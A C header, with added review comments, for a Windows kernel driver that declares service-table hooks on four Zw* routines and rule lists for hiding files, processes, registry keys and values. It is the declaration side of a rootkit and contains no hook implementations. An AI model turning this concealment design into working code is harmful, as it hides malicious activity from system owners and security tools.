/*
 * Cyber02Hide.h
 *
 * Declarations for a Windows kernel-mode driver.  The header declares:
 *   - a local copy of the service-descriptor-table entry layout plus an
 *     import of KeServiceDescriptorTable;
 *   - for each of four Zw* services (ZwQueryDirectoryFile,
 *     ZwQuerySystemInformation, ZwEnumerateKey, ZwEnumerateValueKey) a
 *     prototype of the original, a function-pointer typedef, a pointer
 *     variable named Real*, and a prototype of a replacement named Hook*;
 *   - per-category linked-list "rule" records (256-byte name + next pointer)
 *     and Add*/Del* functions that take them, plus m_*HideInfo / m_*RuleNum
 *     file-scope variables.
 *
 * Nothing in this header shows how the Real*/Hook* pairs are wired up; the
 * imported service table and the naming suggest service-table patching, which
 * is what kernel integrity checks and hook scanners look for — inferred from
 * the names here, not established by this file.
 *
 * NOTE(review): every file-scope object below that carries an initializer
 * (m_*HideInfo, m_*RuleNum, t_Key*) and every Real* pointer variable is a
 * *definition*, not a declaration.  A header that is included from more than
 * one translation unit will then produce duplicate-symbol link errors.  The
 * conventional layout is `extern` declarations here and one definition in a
 * single .c file.
 *
 * NOTE(review): the include guard _HOOKPORT0123456789_ begins with an
 * underscore followed by an uppercase letter, which is an identifier reserved
 * for the implementation in C.
 */
#ifndef _HOOKPORT0123456789_
#define _HOOKPORT0123456789_
/* NOTE(review): the system-header names on the next line were lost in
 * extraction; only the project header "timeandproc.h" survived.  Restore the
 * original <...> names from the source archive before building. */
#include#include #include #include #include "timeandproc.h"

/* Packed to 1-byte alignment (pragma visible below).  Why packing is needed
 * for this three-pointer/one-int record is not explained here. */
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase; //Used only in checked build
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

/* Imported kernel export; declared with the local packed layout above. */
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

/******************************************Driver entry points********************************************/
// Unload
void DriverUnload(IN PDRIVER_OBJECT DriverObject);// driver unload
NTSTATUS DriverIoControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);// driver I/O control
// Dispatch
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);

/******************************************File hiding********************************************/
/* Local redeclaration of FILE_BOTH_DIR_INFORMATION.  FileName[1] is a
 * one-element trailing array, presumably used as a variable-length tail
 * (FileNameLength gives the byte count) — confirm against the DDK layout. */
typedef struct _FILE_BOTH_DIR_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;
    ULONG EaSize;
    CCHAR ShortNameLength;
    WCHAR ShortName[12];
    WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;// (original comment: "original function" — misplaced; this is a record layout)

// Declaration of the function to be hooked
NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile(
    IN HANDLE hFile,
    IN HANDLE hEvent OPTIONAL,
    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
    IN PVOID IoApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK pIoStatusBlock,
    OUT PVOID FileInformationBuffer,
    IN ULONG FileInformationBufferLength,
    IN FILE_INFORMATION_CLASS FileInfoClass,
    IN BOOLEAN bReturnOnlyOneEntry,
    IN PUNICODE_STRING PathMask OPTIONAL,
    IN BOOLEAN bRestartQuery);

// Function-pointer type matching ZwQueryDirectoryFile
typedef NTSTATUS (*REALZWQUERYDIRECTORYFILE)(
    IN HANDLE hFile,
    IN HANDLE hEvent OPTIONAL,
    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
    IN PVOID IoApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK pIoStatusBlock,
    OUT PVOID FileInformationBuffer,
    IN ULONG FileInformationBufferLength,
    IN FILE_INFORMATION_CLASS FileInfoClass,
    IN BOOLEAN bReturnOnlyOneEntry,
    IN PUNICODE_STRING PathMask OPTIONAL,
    IN BOOLEAN bRestartQuery);

// Pointer to the original function (NOTE(review): defined, not declared, in a header)
REALZWQUERYDIRECTORYFILE RealZwQueryDirectoryFile;

// Prototype of the replacement routine; same parameter list as the original
NTSTATUS HookZwQueryDirectoryFile(
    IN HANDLE hFile,
    IN HANDLE hEvent OPTIONAL,
    IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
    IN PVOID IoApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK pIoStatusBlock,
    OUT PVOID FileInformationBuffer,
    IN ULONG FileInformationBufferLength,
    IN FILE_INFORMATION_CLASS FileInfoClass,
    IN BOOLEAN bReturnOnlyOneEntry,
    IN PUNICODE_STRING PathMask OPTIONAL,
    IN BOOLEAN bRestartQuery);

/* Names of files to hide (storage format not shown in this header) */
PUCHAR m_FileHideInfo = NULL;
/* Number of file-hiding entries */
ULONG m_FileRuleNum = 0; //add by htr on 2005-06-27

// Transfer format for a file-hiding rule: singly linked list of fixed-size names
typedef struct _FileHideRule{
    char rule[256];// file name to hide (256-byte fixed buffer; termination not enforced by the type)
    struct _FileHideRule *_next;// pointer to the next rule, or presumably NULL at the end — confirm in the .c
} FILEHIDERULE, *PFILEHIDERULE;

// Add / delete a file-hiding rule.  Return meaning of the UCHAR is not documented here.
UCHAR AddFileCtrlInfo(PFILEHIDERULE FileRule);
UCHAR DelFileCtrlInfo(PFILEHIDERULE FileRule);

/******************************************Process hiding********************************************/
/* Local redeclarations of the SYSTEM_PROCESSES / SYSTEM_THREADS records. */
struct _SYSTEM_THREADS {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientIs;   // NOTE(review): presumably a typo for ClientId; field name kept as-is
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
};

struct _SYSTEM_PROCESSES {
    ULONG NextEntryDelta;
    ULONG ThreadCount;
    ULONG Reserved[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters;
    struct _SYSTEM_THREADS Threads[1];   // one-element trailing array; ThreadCount presumably gives the real count
};

// Declaration of the function to be hooked
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformaitonLength,
    OUT PULONG ReturnLength OPTIONAL);

// Function-pointer type matching ZwQuerySystemInformation
typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)(
    IN ULONG SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformaitonLength,
    OUT PULONG ReturnLength OPTIONAL);

// Pointer to the original process-query function (NOTE(review): defined in a header)
REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;

// Prototype of the replacement routine; same parameter list as the original
NTSTATUS HookZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformaitonLength,
    OUT PULONG ReturnLength OPTIONAL);

/* Names of processes to hide */
PUCHAR m_ProcessHideInfo = NULL;
/* Number of process-hiding entries */
ULONG m_ProcessRuleNum = 0; //add by htr on 2005-06-27

// Transfer format for a process-hiding rule (same shape as FILEHIDERULE)
typedef struct _ProcessHideRule{
    char rule[256];// name to hide (original comment said "file name"; copied from the file rule)
    struct _ProcessHideRule *_next;// pointer to the next rule
} PROCESSHIDERULE, *PPROCESSHIDERULE;

// Add / delete a process-hiding rule
UCHAR AddProcessCtrlInfo(PPROCESSHIDERULE ProcessRule);
UCHAR DelProcessCtrlInfo(PPROCESSHIDERULE ProcessRule);

/******************************************Registry key hiding********************************************/
// Declaration of the function to be hooked
NTSYSAPI NTSTATUS NTAPI ZwEnumerateKey(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_INFORMATION_CLASS KeyInformationClass,
    OUT PVOID KeyInformation,
    IN ULONG Length,
    OUT PULONG ResultLength);

// Function-pointer type matching ZwEnumerateKey
// (original comment said "ZwQuerySystemInformation" — copy-paste error)
typedef NTSTATUS (*REALZWENUMERATEKEY)(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_INFORMATION_CLASS KeyInformationClass,
    OUT PVOID KeyInformation,
    IN ULONG Length,
    OUT PULONG ResultLength);

// Pointer to the original registry-enumeration function (NOTE(review): defined in a header)
REALZWENUMERATEKEY RealZwEnumerateKey;

// Prototype of the replacement routine; same parameter list as the original
NTSTATUS HookZwEnumerateKey(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_INFORMATION_CLASS KeyInformationClass,
    OUT PVOID KeyInformation,
    IN ULONG Length,
    OUT PULONG ResultLength);

/* Names of registry keys to hide */
PUCHAR m_KeyHideInfo = NULL;
/* Number of registry-key-hiding entries */
ULONG m_KeyRuleNum = 0; //add by htr on 2005-06-27
/* Names to hide that exist under a specific key (how "specific key" is chosen is not shown here) */
PUCHAR t_KeyHideInfo = NULL;
/* Number of entries in t_KeyHideInfo */
ULONG t_KeyRuleNum = 0; //add by htr on 2005-06-27

// Transfer format for a registry-key-hiding rule (same shape as FILEHIDERULE)
typedef struct _KeyHideRule{
    char rule[256];// name to hide (original comment said "file name"; copied from the file rule)
    struct _KeyHideRule *_next;// pointer to the next rule
} KEYHIDERULE, *PKEYHIDERULE;

// Add / delete a registry-key-hiding rule
UCHAR AddKeyCtrlInfo(PKEYHIDERULE KeyRule);
UCHAR DelKeyCtrlInfo(PKEYHIDERULE KeyRule);

/******************************************Registry value hiding********************************************/
// Declaration of the function to be hooked
// NOTE(review): declared without NTAPI, unlike the three Zw* declarations
// above; presumably an omission — confirm against the DDK declaration.
NTSYSAPI NTSTATUS ZwEnumerateValueKey(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    OUT PVOID KeyValueInformation,
    IN ULONG Length,
    OUT PULONG ResultLength );

// Function-pointer type matching ZwEnumerateValueKey
// (original comment said "ZwQuerySystemInformation" — copy-paste error)
typedef NTSTATUS (*REALZWENUMERATEVALUEKEY)(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    OUT PVOID KeyValueInformation,
    IN ULONG Length,
    OUT PULONG ResultLength );

// Pointer to the original registry-value-enumeration function (NOTE(review): defined in a header)
REALZWENUMERATEVALUEKEY RealZwEnumerateValueKey;

// Prototype of the replacement routine; same parameter list as the original
NTSTATUS HookZwEnumerateValueKey(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    OUT PVOID KeyValueInformation,
    IN ULONG Length,
    OUT PULONG ResultLength );

/* Names of registry values to hide */
PUCHAR m_ValueHideInfo = NULL;
/* Number of registry-value-hiding entries */
ULONG m_ValueRuleNum = 0; //add by htr on 2005-06-27

// Transfer format for a registry-value-hiding rule (same shape as FILEHIDERULE)
typedef struct _ValueHideRule{
    char rule[256];// name to hide (original comment said "file name"; copied from the file rule)
    struct _ValueHideRule *_next;// pointer to the next rule
} VALUEHIDERULE, *PVALUEHIDERULE;

// Add / delete a registry-value-hiding rule
UCHAR AddValueCtrlInfo(PVALUEHIDERULE ValueRule);
UCHAR DelValueCtrlInfo(PVALUEHIDERULE ValueRule);

#endif